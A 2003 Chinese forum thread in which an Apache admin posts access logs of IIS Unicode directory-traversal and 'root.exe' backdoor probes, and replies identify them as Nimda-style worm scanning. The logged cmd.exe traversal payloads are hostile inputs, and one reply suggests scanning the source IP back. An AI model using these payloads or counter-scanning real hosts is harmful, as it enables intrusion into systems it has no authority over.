这个是什么意思???是有谁在攻击我吗???

hgkrt · 发表于 2003-2-2 10:31:14

[code:1]218.26.187.229 - - [02/Feb/2003:07:26:55 +0900] "GET /msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 368
218.26.187.229 - - [02/Feb/2003:07:26:56 +0900] "GET /scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:56 +0900] "GET /scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:57 +0900] "GET /scripts/..%c0%af../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:58 +0900] "GET /scripts/..%c1%9c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:58 +0900] "GET /scripts/..%%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 400 318
218.26.187.229 - - [02/Feb/2003:07:26:59 +0900] "GET /scripts/..%%35c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 400 318
218.26.187.229 - - [02/Feb/2003:07:27:00 +0900] "GET /scripts/..%25%35%63../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
218.26.187.229 - - [02/Feb/2003:07:27:00 +0900] "GET /scripts/..%252f../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 335
218.26.217.76 - - [02/Feb/2003:10:00:29 +0900] "GET /scripts/root.exe?/c+dir HTT
P/1.0" 404 313
218.26.217.76 - - [02/Feb/2003:10:00:30 +0900] "GET /MSADC/root.exe?/c+dir HTTP/
1.0" 404 311
@[/code:1]

上面是我的apache的access log...[/code]

hgkrt · 发表于 2003-2-2 10:36:01

还有...

[code:1]
200.206.62.115 - - [02/Feb/2003:04:31:25 +0900] "GET /scripts/root.exe?/c+dir HT
TP/1.0" 404 313
200.206.62.115 - - [02/Feb/2003:04:31:29 +0900] "GET /MSADC/root.exe?/c+dir HTTP
/1.0" 404 311
200.206.62.115 - - [02/Feb/2003:04:31:35 +0900] "GET /c/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 321
200.206.62.115 - - [02/Feb/2003:04:31:38 +0900] "GET /d/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 321
200.206.62.115 - - [02/Feb/2003:04:31:41 +0900] "GET /scripts/..%255c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 335
200.206.62.115 - - [02/Feb/2003:04:31:44 +0900] "GET /_vti_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
200.206.62.115 - - [02/Feb/2003:04:31:47 +0900] "GET /_mem_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
200.206.62.115 - - [02/Feb/2003:04:31:51 +0900] "GET /msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 368
200.206.62.115 - - [02/Feb/2003:04:31:55 +0900] "GET /scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
200.206.62.115 - - [02/Feb/2003:04:31:59 +0900] "GET /scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334[/code:1]

请问我有什么办法可以通过IP查他,攻击他???怎么预防???

我的服务器是rh7.1,客户机是XP...

hmqq · 发表于 2003-2-2 11:16:15

哈哈，没事的。那是人家用扫描程序扫描你的机器。
从log可以看出它是扫描你的机器有没有IIS的Unicode(?)漏洞
你又不用Win2000的IIS，所以对你来说这些对你的服务器安全是没什么影响的
(当然也不能不注意安全，如果Apache发现有什么新漏洞，别忘了打补丁)

你知道他的IP，也可以扫描他啊。看看他的机器有什么漏洞。。。。。其他的就不说了
那IP也有可能是被黑了，其他人通过他扫描。：)

gugong · 发表于 2003-2-8 14:12:59

中了尼姆达类的病毒的机器会主动去扫描其他机器，以达到感染和传播病毒的目的。

并不见得是一个人没事做，在扫啊扫，想攻击你。

		自动登录	找回密码
密码			注册